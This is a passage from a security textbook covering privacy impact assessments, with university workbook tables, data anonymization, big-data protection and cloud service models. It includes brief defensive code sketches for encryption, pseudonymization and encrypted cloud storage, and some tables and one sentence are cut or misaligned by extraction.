After a data inventory is created, a risk analysis related to privacy can be performed. This analysis occurs through a Privacy Impact Assessment (PIA). If privacy is concerned with authorized but inappropriate processing, then privacy risk is concerned with problematic data actions [5]. While security is concerned with risk at the organizational level, privacy is concerned with risk at the personal level. This can include legal issues or loss of morale, trust, or interest in using a service. An example of a problematic data action is profiling, which is processing to analyze or predict someone’s personal interests, preferences, behavior, movement, work performance, or financial or health situation [4]. The major steps of the PIA are shown in Fig. 10.1.

Fig. 10.1 Procedure for privacy impact assessment: Regulation (address legal, regulatory, contractual and policy requirements) → Risk (assess risk, including threats, vulnerabilities, impact and likelihood) → Controls (design controls for mitigating privacy risks) → Prioritize (prioritize and implement privacy controls and practices)

Major factors to consider as part of a privacy risk model include: (1) applicable regulation; (2) external factors; (3) third-party relationships (e.g., contracts); and (4) internal factors relating to the organization [6]. Regulatory considerations include how national and international regulation(s) affect the business, including mandated controls. Once we understand where we are and where we want to be, a gap analysis determines how to achieve the desired state. (Obtaining legal expertise can help.) In addition to regulation, external factors may include industry standards and societal expectations. Third-party relationships include privacy obligations in contracts and subcontracts, including those for partners and suppliers. Internal factors include the organization’s risk tolerance, brand reputation, ethical culture, and technical capabilities. The entire data lifecycle should also be considered, since data in all its stages must be controlled, including collection, use, storage, sharing, and destruction [4].

The PIA process generally follows the risk management process, including a risk analysis, risk assessment and action plan [6]. The privacy risk analysis evaluates the risk factors mentioned above as well as risk scenarios. The risk assessment then uses qualitative, quantitative, or semi-quantitative analysis techniques, as outlined in the chapter on risk (a simple qualitative scoring sketch appears at the end of this discussion). A cost-benefit analysis should evaluate controls for both security and privacy purposes, since they are interrelated. However, the analysis may conclude that controls are not feasible, and that the project needs to reduce functionality. An action plan then prioritizes control implementation.

The following three tables show a modified version of the GDPR Data Privacy Impact Analysis (DPIA) [8], including an outline of processing and concerns (Table 10.3), a privacy risk analysis (Table 10.4) and a summary of controls (Table 10.5). In the example shown, the Financial Sponsorship Form has been prioritized, since its classification ranks as Confidential. Other forms rank as Protected, which is a lower priority. Table 10.4 is the traditional risk analysis applied to privacy and security. Notice that the types of privacy issues (e.g., breach, stigmatization, re-identification) are described, along with the security issues to the data controller. After performing a risk analysis, it is possible to prioritize risk and define how controls can be implemented to safeguard data. The next step in the Privacy Impact Analysis is to evaluate controls, prioritize changes, and develop a Corrective Action Plan to implement the required changes.


Table 10.3 A modified GDPR data privacy impact analysis (part 1) (workbook exercise). Information type: Financial Sponsorship Form.

Primary purpose: What is the primary purpose of processing this data? What are the benefits of the processing, for your organization and more broadly? What is the intended effect on data subjects?
Answer: According to U.S. regulation, international students must demonstrate sufficient funds before being issued a Visa to study in the U.S. This ensures that they can complete their degree after it has been started. The university benefits by having a qualified and diverse student body.

Processing of data: How will you collect, use, store and delete data, and how will your organization process the data? What is the source of the data? Will you be sharing data with anyone? It is helpful to include a flow diagram of some sort. What data processing may be high risk?
Answer: The data is collected after a student is admitted and before a Visa is issued. The information is obtained via an encrypted webpage, after login with two-factor authentication. After the first week of school, the PDF is archived offline and is no longer available anywhere online. This data is high risk because it provides financial information, including name, bank, account total, and often account number. If the account is breached, social engineering or other hacking techniques may result in significant family savings (or debt) being stolen.

Scope of processing: What is the nature of the data, and which special categories of people or PII does this affect? How many individuals are affected? What data items will you be collecting and using? How often? How long will you retain data? What geographical area does it cover?
Answer: The number of individuals affected is the number of international students attending the university. The nature of the data is confidential financial information, but it does not include any special category of people (e.g., children, convicts). The data is retained for 5 years in archived, offline form, in case of government review.

Context of processing: What relationship do you have with the individuals? How much control will they have? What is your agreement with the individuals as to how they can access or control their data? What security or privacy issues have you encountered previously? What issues might be of public concern today? What controls do you implement, and how do they relate to current technology? Are you following any approved code of conduct or certification scheme?
Answer: Prospective students send us financial information, required by the U.S. government. Students may update this information, but rarely do. Of greatest concern is that this information is transmitted and stored in encrypted ways, and is maintained online for as short a period as possible. The records are compressed and stored in encrypted form in the second week of the fall and spring semesters. Only the International Student Services organization accesses this information.

Consultation with stakeholders: How and when will you seek data subjects’ and others’ views, or justify why it is not appropriate to do so? Who is involved within your organization, including security or other experts?
Answer: Local and statewide security personnel made this implementation possible. Since the U.S. requires this information, it is required processing. Students are aware and participate.

Privacy principles: How will privacy principles be addressed? If you address specific regulation, how are specific articles met? How will you prevent function creep and update and maintain policy implementation?
Answer: The following principles are applied. Purpose limitation: data is collected and used only for its explicitly defined intention. Data minimization: only the minimum, necessary data is collected and used to fulfill the defined (or legally authorized) purpose. Storage limitation: data is not retained for longer than necessary, although archival is used for government audit purposes.

Table 10.4  Risk analysis component of PIA (workbook exercise)

Source of risk and impact on individuals Financial Sponsorship Form contains confidential financial information of a large amount of money. A breach can result in identity fraud. Threat to student(s) in loss of finances; potential of not completing the degree program, not finding the resulting higher-paying job; still must pay back loans or parents; parents lost retirement savings in same account. Threat to university in resulting lawsuit. Grades: Breach, stigmatization and induced disclosure if grades are exposed. Potential of public discussion of grades, including permanent online exposure. Threat to university includes ransom demand and federal review of policies. Exception to Full-Time Status Form: Stigmatization if student is not full time because of lack of qualification; no choice of study partners.

Severity (minimal, significant or severe) Severe to individual

Likelihood (remote, possible or probable) Possible or eventually probable

Significant to individual; severe to university

Eventually probable

Possible Minimal to individual and university

Overall risk (low, medium or high) High

High

Low

10.3.1 Defining Controls

Table 10.5, designed from a part of the E.U. GDPR’s DPIA template [8], considers controls for the Einstein University data, as documented in previous tables. Controls should be considered through the entire data life cycle, including planning (inventory, classification, minimization), data analytics, data migration, data storage, data warehousing, data retention and archiving, and data destruction [4]. Types of controls considered for data privacy include [4]:


Table 10.5 Controls to reduce privacy risk (workbook exercise)

Risk: Financial Sponsorship Form: Breach -> Identity Fraud. Optional controls to reduce or eliminate risk: Encrypted transmission and storage of data; early offline archival of financial information; data retention is 5 years. Effect on risk (eliminated, reduced, accepted): Reduced. Residual risk (low-medium-high): Low. Measure approved (yes/no): Yes.

Risk: Grades: Inaccurate grade due to instructor error. Controls: Policy to enable student to petition to instructor, then Dean of Students. Effect on risk: Reduced. Residual risk: Low. Measure approved: Already implemented.

Risk: Exception to Full-Time Status. Controls: Encrypted storage of data; early offline archival of forms; data retention is 5 years. Effect on risk: Reduced. Residual risk: Low. Measure approved: Yes; responsibility: IT.

Risk: Grades: Reporting for analytic purpose. Controls: Analysis occurs with statistical averages over courses, majors or other means, without exposing student names. Effect on risk: Reduced. Residual risk: Low. Measure approved: Yes; responsibility: Metrics office.

• Encryption and hashing of data in transmission and storage: Encryption protects packets in transmission, and protects data when a memory device or archive is stolen or lost. This also includes related controls for public key infrastructure and certificates. These topics are discussed in the Network Security chapter. (A minimal encryption-at-rest sketch appears after this list.)
• Authentication and access control: Access control techniques are discussed in the Information Security chapter.
• Logging and alarms: Logging of application transactions; of system, network and application configuration changes; and of other privacy and security events is discussed in the Incident Response chapter.
• Deleted data: This includes secure wipe, degaussing, destruction, and crypto-shredding. These controls are discussed in the Information Security chapter.
• Privacy by Design: Integration of privacy into the entire software development process, preventing privacy from being bolted on at the end of the process [4].
• Anonymizing data: When people obtain access to data through a database (whether authorized or not), even encrypted data will be visible. Thus, it is helpful not to store personally identifiable information in that database. That is our next topic.
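Before turning to anonymization, here is a minimal sketch of the first control above, encrypting data at rest, using the widely available Python cryptography package. The record contents and the inline key generation are illustrative assumptions; in practice the key would come from a key-management system.

```python
# pip install cryptography
from cryptography.fernet import Fernet

# Illustrative only: a real deployment would fetch this key from a
# key-management service rather than generate it next to the data.
key = Fernet.generate_key()
f = Fernet(key)

record = b"Financial Sponsorship Form: account total $48,000"
token = f.encrypt(record)   # ciphertext, safe to store or archive offline
print(f.decrypt(token))     # original bytes, recoverable only with the key
```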

10.3.2 Anonymizing Data

One way to hide details in the data is to anonymize it, using data obfuscation. A limited data set excludes, or ‘blocklists’, identifying data fields such as name and address, which prevents their disclosure, while


‘allowlisting’ other data fields for which disclosure is permitted. One may also classify certain fields, like zip code or age, into categories. Data can be randomized using a Gaussian statistical distribution, so that any particular value is not accurate but statistical means and variances remain generally accurate [12]. Data obfuscation is a way to balance the data provider’s risk while providing the client permissible data quality, but the anonymization must be done very carefully to ensure privacy.

The main purpose of data obfuscation is to reduce the associability of PII to individuals. This process of disassociability hides any association to individuals during the processing of PII. Disassociability can be achieved using de-identification or data anonymization, which is the removal of PII in an irreversible way. Specific methods to de-identify PII include [4] (a minimal sketch of pseudonymization and k-anonymization appears at the end of this subsection):

• Pseudonymization: hides PII by replacing identifiers, such as names, phone numbers or social security numbers, deleting them or replacing them with temporary IDs, such as alternative numbers or names.
  – Tokenization: replaces actual data with randomly generated numbers.
  – Re-identification: enables the regeneration of the original data using a second file that translates the temporary ID back to the missing identification. This second file is maintained separately, to reduce the probability of breach, and is accessible only to a privileged few.
• K-anonymization: anonymizes attributes that may point indirectly to an identity. For example, if fewer than K (threshold) people live in a particular city or zip code, combine cities or zip codes under a new ID until there are at least K people in that group. Thus, it may replace some values with range data, while other values remain unchanged.

At the hardware level, data scramblers may be used to obfuscate data, hiding main memory contents and transmission packets. In addition to hiding data contents, scrambling improves hardware signal integrity, by avoiding long strings of zeros or ones, and reduces power supply noise. The scrambling algorithm can vary in security effectiveness, from simple exclusive-OR operations modified by a secret key and data address values, to secure encryption techniques [10].
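The following Python sketch illustrates the two de-identification methods above under simplified assumptions: random tokens stand in for pseudonyms, the token-to-name map plays the role of the separately held re-identification file, and zip codes serve as the quasi-identifier being generalized. The field names and the threshold k are illustrative, not prescribed by any standard.

```python
import secrets

# --- Pseudonymization: replace direct identifiers with random tokens.
# The token->identity map is the separately stored "second file" that
# permits authorized re-identification.
reident_map = {}

def pseudonymize(name: str) -> str:
    token = secrets.token_hex(4)
    reident_map[token] = name   # keep separately, access-restricted
    return token

# --- K-anonymization-style generalization of a quasi-identifier.
def generalize_zip(records, k=3):
    """Coarsen any zip code shared by fewer than k records, so that
    no group smaller than k can be singled out by zip code alone."""
    counts = {}
    for r in records:
        counts[r["zip"]] = counts.get(r["zip"], 0) + 1
    for r in records:
        if counts[r["zip"]] < k:
            r["zip"] = r["zip"][:3] + "xx"   # keep only a 3-digit region
    return records

students = [{"name": pseudonymize(n), "zip": z}
            for n, z in [("Ana", "53140"), ("Bo", "53140"),
                         ("Cy", "53140"), ("Di", "60601")]]
print(generalize_zip(students))   # the rare zip "60601" becomes "606xx"
```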

10.4 Step 3: Developing a Policy and Notice of Privacy Practices

A signed-off PIA means that the data inventory is completed, the primary purposes of data processing have been defined, and risks are known and prioritized. Next comes the job of building transparency and trustworthiness via clear communication with data subjects, indicating how their information will be used and, possibly, how they can access and petition to amend their data. Two documents commonly adopted for communicating information privacy policy to data subjects include [4]:


Notice of Privacy Practices (NPP): This is a record to the outside world describing how the controller obtains and uses data. Data subjects and government authorities are the intended audience.

Consent Form: After reading the NPP, the data subject is expected to sign a consent form, indicating that the data subject is aware of how their personal information will be used.

In addition, internal employees must also be aware of how privacy will be implemented in the organization, through policy documentation and training. Privacy policies are internal documents used to communicate rules to employees describing how personal information is to be handled. They are followed up with procedures, standards and guidelines, as described in the Governance chapter. Policies should address the lifecycle of information, including how personal information will be collected, used, retained, secured, and disclosed. Although the intended audiences are different, both the NPP and internal privacy policies need to answer the following questions:

• What data is collected?
• How is personal data used?
• To whom is data shared?
• How long is data retained?
• What rights do data subjects have to inspect or change their records?
• How is the NPP shared with data subjects? Is a consent form required, and if so, how is it obtained?

A good starting point is to collect this information from the regulation(s) your organization must adhere to and from what a lawyer recommends. It may be useful to learn from other examples, including other NPPs that are recommended or exist on the web. Also discuss what might work with different roles in your organization: how do they use the information? Finally, factor in what privileges your data subjects might prefer. The next step is to consider how to communicate your NPP, including posting the NPP on your website, office walls, contracts, and/or customer forms (Table 10.6).

Table 10.6 Einstein University’s notice of privacy practice (workbook exercise)

What data is collected? Einstein University retains student contact information, course registrations, grades, employment records, and news-oriented stories related to sports, arts, extracurricular, academic and other activities.

To whom is data shared? Grade transcripts are shared with external parties only with the data subject’s explicit permission. However, FERPA provides exceptions when a school official has a “legitimate educational interest”, i.e., the official needs to review an education record in order to fulfill his or her professional responsibility. These may include:
  Requests from “school officials”, which generally include university parties such as instructors; administrators, health, and clerical staff; counselors; attorneys; and members of educational or disciplinary committees.
  Requests in connection with an emergency, if such information is necessary to protect the health or safety of you or another person.
  Requests in accordance with a lawful subpoena or court order.
  Requests for public records information.
Shared student contact information includes only name and email address in university website search information. University news stories and websites may discuss sports activities, including descriptions of athletes; student leadership and participation in arts, clubs, and extracurricular activities; and student graduation and academic awards, and may include academic year of study or planned graduation.

How long is data retained? Scholastic transcripts are retained indefinitely, so transcripts may be available at any future date. Contact information is removed after graduation or after one semester of non-attendance.

What rights do students have? The Family Educational Rights and Privacy Act (FERPA) of 1974 affords eligible students certain rights with respect to their own educational records. These rights include:
  1. The right to inspect and review their own educational records within 45 days of the date that Einstein University receives a request for access;
  2. The right to request an amendment of their educational records that the student believes to be inaccurate, misleading or otherwise in violation of their privacy rights under FERPA;
  3. The right to provide written consent to allow disclosure of those records, subject to exceptions;
  4. The right to opt out of making directory information available without consent (FERPA Hold);
  5. Annual notification of privacy practices for students (under FERPA for post-secondary institutions).

How can students inspect and change their records? Requests to review your records must be made in writing and presented to the appropriate office. That office will have up to 45 days to honor your request. For most students these offices will include the registrar’s office/student records, college dean, academic department, financial aid, dean of students or residence life. You may request to have records corrected that you believe to be inaccurate, misleading or in violation of your privacy rights. Requests to change and to challenge information deemed erroneous or misleading should be made in writing and directed to the chair, dean or director of the appropriate office so that a hearing can be scheduled.

How will the NPP be made available to data subjects? The NPP is available on a public website and is emailed to students annually.

10.5 Advanced: Big Data: Data Warehouses

Information is worth money, since it is often sold or harnessed to optimize decisions. This has led to data analytics on large databases. While this may lead to good things (e.g., medical discoveries, weather analysis, and increased profits), it can also lead to data breaches and identity theft.

Two approaches to planning data warehouses are collecting everything and sorting it out later, or deciding what problem you want to solve and then aggregating only that. The second method is superior to the first because it considers the business need for the

data. Carefully evaluating the actual needs of data analysis helps ensure that only the minimum data is retained in a data warehouse. Once the big database is built, security for big data should minimally include [17]:

• Encryption: Stored and transmitted data should both be strongly encrypted. A vault securely manages certificates and keys.
• Authentication and access control: Finely grained access control supports permissions at the field and record level.
• Firewall: Restrict access to only certain types of messages, potentially from certain locations.
• Security intelligence: A tool provides alarms regarding potential intrusions. Advanced tools might have a real-time security status display, similar to a SIEM.

A simple approach is to aggregate the data into one collection, then protect that extremely securely. A complex but possibly more secure approach fragments data in a distributed way, so that no one location provides any meaningful information. An example implementation is a RAID-type configuration, where a record could be distributed over four databases [13]. Alternatively, data can be divided up logically across databases, so that (for example) contact information, credit card number/expiration, and CVV are retained in three different databases [14]; a minimal sketch of this idea appears at the end of this section. This is effective against independent attacks, but not if an attacker manages to penetrate an account.

HIPAA allows for data aggregation, which combines information from multiple health providers [15]. Note that aggregating smaller datasets into one large dataset helps to anonymize individual records. A limited data set excludes all identifying information, such as name, address, contact information, health plan/account numbers, certification/license numbers, vehicle information, device/serial identifiers, internet (IP/URL) information, and biometric and facial images. The advantage of this technique is that even if an account is penetrated, data is obfuscated.
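The following Python sketch illustrates the logical fragmentation idea mentioned above. The three dictionaries are hypothetical stand-ins for three independently secured databases, and the field split mirrors the contact/card/CVV example; a real system would also need per-store authentication and encryption.

```python
# Hypothetical stand-ins for three independently secured databases.
contact_db, card_db, cvv_db = {}, {}, {}

def store_fragmented(customer_id, contact, card_number, expiration, cvv):
    """Split one payment record across stores so that compromising any
    single database yields no usable payment data."""
    contact_db[customer_id] = contact
    card_db[customer_id] = (card_number, expiration)
    cvv_db[customer_id] = cvv

def fetch(customer_id):
    # Only a caller authorized on all three stores can rebuild the record.
    return (contact_db[customer_id], *card_db[customer_id], cvv_db[customer_id])

store_fragmented(17, "A. Student", "4111111111111111", "09/27", "123")
print(fetch(17))   # ('A. Student', '4111111111111111', '09/27', '123')
```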

10.6 Questions

1. Vocabulary. Match each meaning with the correct word: Controller; Policy; Disassociability; Re-identification; Consent form; Data subject; Purpose limitation; Storage limitation; Notice of privacy practices; Data minimization; k-anonymization; Privacy by design.
(a) An entity for whom data is collected by the organization.
(b) An organization that collects data on entities.
(c) A means of communicating privacy rights to clients.
(d) A means of enforcing acknowledgement of the NPP from clients.
(e) Data is retained for the minimum time possible.


(f) Only the minimum and necessary data is collected to achieve the intended purpose.
(g) Information is only used for the explicit, documented intention(s).
(h) The general goal of hiding any association to individuals during the processing of PII.
(i) A second file is used to translate random keys into real identities, enabling the original records to be re-created.
(j) Identifying characteristics, such as home city or region, are renamed to ensure a threshold minimum number of people fall into each category.
(k) In software development, privacy is built into each stage of the project development.

2. Notice of Privacy Practices: Contrasting Examples. Look up three notices of privacy practices online from a selected industry (e.g., healthcare) or across industries. What questions are asked and answered? Evaluate each NPP for what is helpful and not helpful.

3. Notice of Privacy Practices: Legal Issues. Read the regulation associated with a selected industry or nation. What practices are you required to provide related to that regulation?

4. Case Study: Complete Tables 10.1, 10.2, 10.3, 10.4, and 10.5 for your planned organization, potentially completing information requirements for a department.

References

1. Kelleher D (2014) If it’s free, you’re probably the product. TechTalk (blog), GFI Software. https://techtalk.gfi.com/if-its-free-youre-probably-the-product/
2. Hill K (2012) How Target figured out a teen girl was pregnant before her father did. Forbes, 16 Feb 2012. https://www.forbes.com/sites/kashmirhill/2012/02/16/how-target-figured-out-a-teen-girl-was-pregnant-before-her-father-did
3. Davis J (2023) Feds blast ‘shadow’ operations of data brokers, revive calls for federal privacy law. SC Magazine, 20 Apr 2023. https://www.scmagazine.com/news/privacy/feds-blast-shadow-operations-data-brokers-federal-privacy-law
4. ISACA (2020) CDPSE™ review manual. ISACA, Schaumburg
5. Brooks S, Garcia M, Lefkovitz N, Lightman S, Nadeau E (2017) NISTIR 8062: an introduction to privacy engineering and risk management in federal systems, January 2017. National Institute of Standards and Technology, U.S. Department of Commerce. https://doi.org/10.6028/NIST.IR.8062
6. IEEE (2022) IEEE standard for data privacy process (IEEE Std 7002™-2022). Software and Systems Engineering Standards Committee, IEEE Computer Society, 9 Feb 2022
7. FPC (2022) Fair information practice principles. Federal Privacy Council, U.S. Government. https://www.fpc.gov/resources/fipps. Accessed 20 Jan 2023
8. Wolford B (ed) (2022) Data Protection Impact Assessment (DPIA): how to conduct a Data Protection Impact Assessment (template included). Proton Technologies AG. https://gdpr.eu/data-protection-impact-assessment-template/ (accessed 23 July 2022) and https://gdpr.eu/wp-content/uploads/2019/03/dpia-template-v1.pdf
9. European Union (2018) General Data Protection Regulation (GDPR). https://gdpr-info.eu


10. Yitbarek SF, Aga MT, Das R, Austin T (2017) Cold boot attacks are still hot: security analysis of memory scramblers in modern processors. In: 2017 IEEE international symposium on high performance computer architecture. IEEE, pp 313–324
11. Bisdikian C, Sensoy M, Norman TJ, Srivastava MB (2012) Trust and obfuscation principles for quality of information in emerging pervasive environments. In: The 4th international workshop on information quality. IEEE, pp 44–49. http://ieeexplore.ieee.org
12. Chakraborty S, Raghavan KR, Srivastava MB, Bisdikian C, Kaplan LM (2012) Balancing value and risk in information sharing through obfuscation. In: 2012 15th international conference on information fusion (FUSION). IEEE, pp 1615–1622
13. Dev H, Sen T, Basak M, Ali ME (2012) Approach to protect the privacy of cloud data from data mining based attacks. In: 2012 SC companion: high performance computing, networking, storage and analysis, pp 1106–1115
14. Subashini S, Kavitha V (2011) A metadata based storage model for securing data in cloud environment. In: 2011 international conference on cyber-enabled distributed computing and knowledge discovery. IEEE, pp 429–434
15. HHS (2013) HIPAA administrative simplification regulation text. U.S. Department of Health and Human Services, Office for Civil Rights, Mar 2013, pp 59–115
16. Hilliard E (2021) The GDPR: a retrospective and prospective look at the first two years. Berkeley Technology Law Review 35:1245–1289
17. Vora MN (2011) Hadoop–HBase for large-scale data. In: International conference on computer science and network technology (ICCSNT), vol 1. IEEE, pp 601–605. http://ieeexplore.ieee.org

Chapter 11

Planning for Alternative Networks: Cloud Security and Zero Trust

I would strongly recommend against anyone trusting their private data to a company with physical ties to the United States. – Ladar Levison, President of Lavabit, who fought court orders, then closed his company after being sued to reveal its private key [12]

The vast majority of organizations use one or more cloud systems [4], and many implement much of their IT systems on a cloud system, passing control of security to another entity. Cloud systems may be low cost due to increased shared efficiencies [9]. As Fig. 11.1 shows, end-user terminals and computers interface with the Internet, and a cloud service provider provides the computing resources. A form of advanced network, zero trust, is discussed in the second part of this chapter.

Fig. 11.1 Cloud computing

11.1 Important Concepts

A main advantage of cloud services is resource pooling: customers pay the cloud provider for IT services, and gain broad network access and on-demand, elastic service. These features ensure that you get, and pay for, the service you actually use, when you want it. The Cloud Security Alliance [6] describes the features of cloud as offering “agility, resiliency and economy”. Economy is achieved through shared infrastructure, resource pooling, and pay-as-you-go measured service. Agility is achieved through rapid elasticity, since cloud services can be automatically configured, deployed, expanded or contracted, and managed [6, 11]. Resiliency is achieved via automatically managed backups and redundancy on multiple computers in different locations [7].

Particularly for small businesses, a major benefit is that the management and infrastructure of the cloud is handled by the cloud provider. Thus, for organizations without technical or security savvy, such offerings promise to remove the complexity and IT problems from management’s concern. However, to properly establish such an implementation, customers should be aware of the features and contractual


issues that impact them, as well as realize that it takes considerable security skill to properly configure the cloud. There are two issues cloud users should be aware of. First, cloud planning requires decisions and negotiation through the issues and legal complexities of a cloud implementation, including shared responsibility, service level agreements, data privacy and retention policies. Second, cloud is not a security panacea: an international 2021 SANS report [15] found that 16% of organizations experienced a breach in the cloud environment, and that in 20% of cases attackers traversed from the cloud into the internal network. Therefore, it is important to seriously address security in the cloud environment.

The Shared Responsibility Model is the idea that both the cloud provider and cloud users are responsible for aspects of security, depending on the cloud service model. The cloud provider provides security for the bottom portion that it configures and manages, whereas the cloud user is responsible for the user portion that it defines and manages. Regardless of whose fault a failure is, cloud users are in the end 100% responsible for their own security. The Cloud Security Alliance [6] recommends that cloud providers clearly define the security features and controls they implement. Then cloud users should complete a security matrix that apportions the security controls provided by the cloud provider and the controls they must furnish. The Cloud Security Alliance provides a baseline Cloud Controls Matrix (free of charge) to help in this process.

11.1.1 Cloud Deployment Models

Different cloud service models are shown in Fig. 11.2 and include [4, 6, 10, 11]:


Fig. 11.2  Cloud services

Infrastructure as a Service (IaaS)  The cloud provides customers access to processing, storage, networks or other fundamental resources, but the customer provides the applications and possibly the operating system. The cloud provider enables an organization to quickly establish a virtual machine to host their desired operating system and software. The VM is configured from a website within minutes. The cloud user is responsible for most security, including everything built on top of the infrastructure, whereas the cloud provider is primarily responsible for network security, including firewall rules.

Platform as a Service (PaaS)  The consumer provides application software; the cloud provider generally provides the system and software development environment (e.g., a web development toolkit). This format is variable in configuration, and is generally built above an IaaS. It generally offers a VM with a database management system or other software platform offering an Application Programming Interface (API), which can then be programmed by the user. The cloud provider is responsible for patching and hardening the platform, whereas the cloud user is responsible for everything built on that platform, including any software development, application configuration, deployment, log monitoring, authentication, access control, and patching of customer-installed applications.

Container as a Service (CaaS)  One PaaS implementation is the container service, where users develop a container image, or a code execution environment, for deployment. Containers may be run directly on an operating system or within a virtual machine. Unlike virtual machines, which run their own operating system, containers run on top of an operating system. Container service examples include Google’s Kubernetes Engine (GKE), Amazon’s Elastic Container Service (ECS), Azure’s Kubernetes Service (AKS), and Red Hat’s OpenShift. Programming tools to automatically configure containers include Kubernetes, Docker and OpenShift. Programmed configurations can enforce egress firewall rules, network logging, vulnerability testing via container image scanning, default container login, and incident/event notification methods. Thus, they reduce errors in deployment and ensure a consistent policy and hardening implementation.


Storage as a Service (StaaS)  Data storage can be allocated as a service. Data shows up as simply another folder on a computer, which is accessed through a web interface. Examples include Google Drive, Microsoft OneDrive, Apple iCloud, and Dropbox. The cloud provider is responsible for configuration and patching, whereas the cloud user is responsible for user permissions and the selected storage security features. (A minimal sketch of a cloud user securing object storage appears at the end of this subsection.)

Data as a Service (DaaS)  The cloud provider provides data, normally via a database, for client access.

Software as a Service (SaaS)  The cloud provider runs their own applications on cloud infrastructure; this is often synonymous with Database as a Service. This cloud service is often used to share documents among a team. Changes are shared instantly among users. Instead of having documents stored locally on a computer, these shared documents are accessed via an encrypted web interface. The cloud provider is responsible for most security in this configuration, except for the portion that the cloud user manages: authorization and permissions.

Disaster Recovery as a Service (DRaaS)  The cloud does not assume redundancy. When the contract is specially written, cloud services can easily provide failover-type redundancy, automatically, for hosted services. This DRaaS cloud service basically provides a hot-site backup service for services hosted at the customer site, potentially bringing up a site in 0–60 min. Different versions of this service may include [2]:

• Backup and Restore: Backup data is sent continuously to the DRaaS, but no software is operational on the cloud (except for disaster recovery testing).
• Warm Backup or Pilot Light: Backup data is sent continuously and the program is loaded, but zero to minimal transactions are run on the cloud.

Security-related cloud features include [2]:

• Failover: If one site goes down, a backup system takes over.
• Load Balancing: Traffic is distributed proportionally over multiple servers to improve response time and as a means of failover.

Cloud services can also be categorized by their customer type [6]. Public clouds are multitenant: they serve any and all customers. There is usually less contractual flexibility in this model, since services are generalized for all; however, public clouds benefit from economy of scale. Community clouds specialize in a particular business, such as medical or financial. These clouds specialize in particular software, compliance and security services for that industry. Community consensus helps to define services and policy decisions. Private clouds serve individual customers, and can be owned or leased in a third-party agreement. Contracts are negotiated here, but all required services must be documented in the contract.
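As an illustration of the cloud user’s share of the shared responsibility model for storage, the following Python sketch uploads a file to object storage with server-side encryption and a private ACL, assuming AWS S3 via the boto3 library with credentials already configured. The bucket and file names are hypothetical.

```python
# pip install boto3 -- assumes AWS credentials are configured in the environment.
import boto3

s3 = boto3.client("s3")

# The provider secures the underlying storage; requesting encryption and
# keeping the object private is the cloud user's responsibility.
with open("financial-sponsorship.pdf", "rb") as f:
    s3.put_object(
        Bucket="example-records-bucket",        # hypothetical bucket name
        Key="forms/financial-sponsorship.pdf",
        Body=f,
        ServerSideEncryption="AES256",          # encrypt at rest
        ACL="private",                          # no public access
    )
```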


Regardless of how the cloud is used, service level agreements (SLAs) define contractual capabilities, such as backup, security, and availability requirements. (SLAs are discussed in the Personnel Security chapter.) Some clouds specialize in specific industries, such as health, and adhere to industry security regulations. Without such an agreement, no assumptions about service should be made.

11.2 Planning a Secure Cloud Design

The process of deploying a cloud implementation includes [6]:

1. Define security and compliance requirements
2. Select a cloud provider and service/deployment model
3. Define the architecture
4. Assess security controls
5. Identify gaps in control
6. Address and implement missing security controls
7. Monitor and manage changes

We will review the planning aspects of these stages next, combining steps 4–6 into one ‘Assess and Implement Security Controls’ stage.

11.3 Step 1: Define Security and Compliance Requirements

In a normal, internal network, security concerns relate to confidentiality, integrity, and availability, and the main attackers of concern include external attackers, rogue employees, and issues related to application attacks, hardware faults, and natural or manmade disasters. In the cloud, additional concerns are privacy and lack of control. Privacy issues refer to the retrieval of personal information out of curiosity or even greed (selling of information). Privacy concerns can relate to cloud providers’ or cloud auditors’ access to users’ identity, preferences, and habits [16]. Privacy also requires data protection from other cloud customers. See Fig. 11.3 for a simple misuse diagram demonstrating threats related to cloud. Table 11.1 shows security and privacy considerations related to the university learning management system (a database of student coursework).

Fig. 11.3 Threats to cloud security (misuse diagram; actors: external attacker, nature/disaster, rogue employee, cloud employee/auditor, shadow IT; misuse cases: attack application, fail equipment, fail network, misconfiguration, use unauthorized app, reduce control/privacy, reduce priority)

Table 11.1 Threats to learning management system: security and privacy (workbook exercise)

Confidentiality:
  Security issue: Grades are released, resulting in a FERPA investigation.
  Security issue: Assignments are unknowingly copied from one student to another.
  Security issue: A cloud employee sells or gives answers to students.
  Privacy issue: Files copied from a top student are thought to be cheating; the student earns a zero.
Integrity:
  Security issue: Submitted assignments are mixed up, lost or deleted by system failure, an attacker, or a rogue employee.
  Security issue: Ransomware deletes all homework; the ransom is too high to pay; no grades are available for courses for the semester.
  Privacy issue: Students whose work is lost suffer undeserved bad grades.
Availability:
  Security issue: Assignments are due but students cannot access the system to submit. This is particularly problematic during homework and exam submission deadlines.
  Privacy issue: Students worry about not submitting on time; a late grade assigned results in course failure.
Regulation:
  FERPA (Family Educational Rights and Privacy Act): School grades are protected.
  State breach notification: Student identifiers must be protected. Social security numbers and financial records are not maintained in this database.

In addition to privacy issues, reduced control is also a concern. One new dependency is network availability [9]. For local office server usage, it is important to determine the reliability of network services and consider a backup service. Secondly, the cloud controls the configuration of its services, so it is possible for rarely accessed data to be removed to improve cloud profitability [16]. A third issue is failures of the cloud interface: SANS [15] reports that in configuring cloud services, misconfigurations are common, and that clouds sometimes have vulnerabilities in software or API interfaces. Finally, in the case of Shadow IT, the IT

To counter this relinquishing of control, it is important to verify security. Third-party auditors can verify security services for public or other shared cloud services. Monitoring of cloud usage metrics is also useful, using network flow data and network access control monitoring [15]. Proper monitoring of usage metrics requires a good baseline set of statistics and attention to false positives.


Full data privacy on a public cloud can be achieved by keeping data fully encrypted, even during processing. Such encryption of data in the cloud protects data privacy but restricts data usability, including searching. New searchable encryption algorithms enable searching of encrypted data. Basic search algorithms often rely on encrypting search words, which are compared against an encrypted index, but many more sophisticated algorithms exist [16]. Homomorphic encryption allows data to be manipulated and computational algorithms to be performed on encrypted data. Algorithms also exist to support encrypted integrity, access control, etc. A minimal sketch of the basic token-matching approach appears below.
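The following is a minimal sketch of the keyword-token idea described above, using an HMAC of each keyword as a deterministic search token. It is illustrative only: real searchable-encryption schemes are considerably more sophisticated, and all names here are hypothetical.

import hmac, hashlib

def keyword_token(key: bytes, word: str) -> str:
    """Derive a deterministic search token from a keyword.
    The server sees only tokens, never plaintext keywords."""
    return hmac.new(key, word.lower().encode(), hashlib.sha256).hexdigest()

def build_index(key: bytes, doc_id: str, words: list) -> dict:
    """Client-side: map each keyword token to the document id."""
    index = {}
    for w in words:
        index.setdefault(keyword_token(key, w), set()).add(doc_id)
    return index

def search(index: dict, key: bytes, word: str) -> set:
    """The client derives the token; the (untrusted) server matches it
    against the encrypted index without learning the keyword."""
    return index.get(keyword_token(key, word), set())

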